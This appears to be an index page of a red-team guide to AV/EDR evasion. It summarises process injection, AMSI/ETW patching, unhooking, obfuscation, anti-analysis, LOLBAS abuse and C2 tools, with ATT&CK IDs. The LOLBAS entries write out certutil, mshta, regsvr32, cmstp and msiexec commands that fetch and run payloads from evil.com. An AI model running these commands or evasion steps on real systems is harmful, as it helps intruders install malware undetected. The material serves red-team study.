🎭 AV/EDR Evasion Techniques
Comprehensive guide to bypassing antivirus, EDR solutions, and endpoint protection. Learn process injection, code obfuscation, and defense evasion techniques used by red teams and advanced threat actors.
Evasion techniques allow malware and penetration testing tools to bypass security controls, avoid detection by EDR solutions, and execute malicious code without triggering alerts. These techniques are critical for red team operations and advanced threat simulations.
💉 Process Injection
DLL Injection
ATT&CK T1055.001 ExpertInject malicious DLL into running process via CreateRemoteThread and LoadLibrary. Classic technique used by malware.
Full GuideProcess Hollowing
ATT&CK T1055.008 ExpertUnmap legitimate process and replace with malicious code. Create target process in suspended state, then hollow it out.
Full GuideProcess Doppelgänging
ATT&CK T1055.009 ExpertUse NTFS transactions to replace executable at rest while running process from cached version. Bypasses file-based AV.
Full GuideAPC Injection
ATT&CK T1055.004 AdvancedQueue Asynchronous Procedure Calls to threads in alertable state. Fire-and-forget execution before threads return to user code.
Full GuideEarly Bird Injection
ATT&CK T1055.001 ExpertInject shellcode before target process reaches its entry point. Injects during ntdll initialization phase.
Full GuideThread Local Storage Injection
ATT&CK T1055.005 AdvancedManipulate TLS callbacks to redirect execution to malicious code when process or thread starts.
Full Guide🛡️ EDR Bypass Techniques
DLL Unhooking
Custom ExpertRestore hooked API functions by copying clean .text sections from disk. Removes EDR inline hooks from ntdll, kernel32, etc.
Full GuideETW Blocking
Custom AdvancedPatch EtwEventWrite and EtwTiLogOnstackEvent to block ETW telemetry. Prevents kernel event tracing.
Full GuideAMSI Bypass
Custom AdvancedPatch AmsiScanBuffer and AmsiScanString to always return AMSI_RESULT_CLEAN. Enables PowerShell script execution.
Full GuideDirect Syscalls
Custom ExpertBypass user-land hooks by making direct system calls to ntdll. Use syscall numbers to call kernel directly.
Full GuideHeaven's Gate
Custom ExpertExecute 64-bit code from 32-bit process via far jump to 64-bit code segment. Bypasses 32-bit monitoring.
Full GuideTiming Attacks
Custom AdvancedUse Sleep() and Calculate elapsed time to detect instrumentation. Sleep longer if being debugged.
Full Guide🔐 Code Obfuscation
Payload Packers
T1027.002 AdvancedCompress and encrypt executables. Decrypt at runtime in memory. UPX, custom packers with anti-debugging.
Full GuideShellcode Encryption
T1027.001 AdvancedEncrypt shellcode with AES-256. Decrypt key stored separately or derived at runtime. Obfuscate strings.
Full GuidePolymorphic Code
T1027.001 ExpertSelf-modifying code that changes appearance on each execution. Use junk code insertion and register randomization.
Full GuideXOR Obfuscation
T1027.001 IntermediateSimple XOR encoding with single or multi-byte keys. Decode at runtime before execution.
Full Guide🎭 Defense Evasion
Parent PID Spoofing
T1134.004 AdvancedSpawn processes with spoofed parent PID (explorer.exe). Makes attribution harder and avoids monitoring.
Full GuideMasquerading
T1036 IntermediateRename malicious executables to match system binaries. Use Windows\System32 paths to appear legitimate.
Full GuideTimestomping
T1070.006 IntermediateModify file timestamps (create/modify/access) to match legitimate files or blend with existing files.
Full GuideFile Deletion
T1070.004 IntermediateDelete files after use using native tools (cmd.exe del) or direct syscalls to avoid recycle bin.
Full GuideNetwork Evasion
T1090 AdvancedUse domain fronting, encrypted C2 channels, and fast-flux DNS to avoid network-based detection.
Full GuideService Root
T1569.002 AdvancedRun malicious code as a Windows service via sc.exe or direct service API calls with SYSTEM privileges.
Full Guide🔍 Anti-Analysis Techniques
Anti-Debugging
T1143 AdvancedDetect debugger presence using IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess.
Full GuideAnti-VM Detection
T1497.001 AdvancedDetect virtualized environments via CPUID, MAC addresses, registry keys, WMIC output, and hardware artifacts.
Full GuideAnti-Sandbox
T1497 AdvancedDetect sandbox by checking user count, running processes, sample folder paths, and idle time.
Full GuideMemory Scrubbing
Custom ExpertClear forensic evidence from memory after execution. Zero out allocated memory regions before freeing.
Full Guide🧪 LOLBAS (Living Off the Land)
CertUtil Download
T1105 Intermediatecertutil.exe -urlcache -split -f http://evil.com/payload.exe payload.exe
Full GuideMSHTA Execution
T1218.003 Intermediatemshta.exe http://evil.com/payload.hta - Execute HTA content from URL or local file.
Full GuideMSBuild
T1127 AdvancedExecute inline C# code via MSBuild.exe. No compiler needed, executes in clean process.
Full GuideRegsvr32
T1218.010 Intermediateregsvr32.exe /s /n /u /i:http://evil.com/file.sct - Execute via SCT scriptlet.
Full GuideCMSTP
T1218.003 Intermediatecmstp.exe /s /ns http://evil.com/payload.inf - Bypass UAC and execute via CMSTP.
Full GuideMsiexec
T1218.007 Intermediatemsiexec.exe /q /i http://evil.com/payload.msi - Execute via MSI package.
Full Guide🛠️ Essential Tools
Cobalt Strike
Commercial red team C2 framework with built-in evasion capabilities, process injection, and lateral movement.
Covenant
Open-source .NET-based C2 framework with strong cross-platform support and built-in evasion features.
Sliver
Open-source C2 framework by Bishop Fox with implant generation, process injection, and EDR bypass.
PE-Sieve
Memory forensics tool to detect process hollowing, Doppelgänging, and other injection techniques.
Frida
Dynamic instrumentation toolkit for hooking, tracing, and manipulating running processes at runtime.
UnhookPE
Tool to unhook EDR DLL hooks by restoring original functions from disk-loaded copies.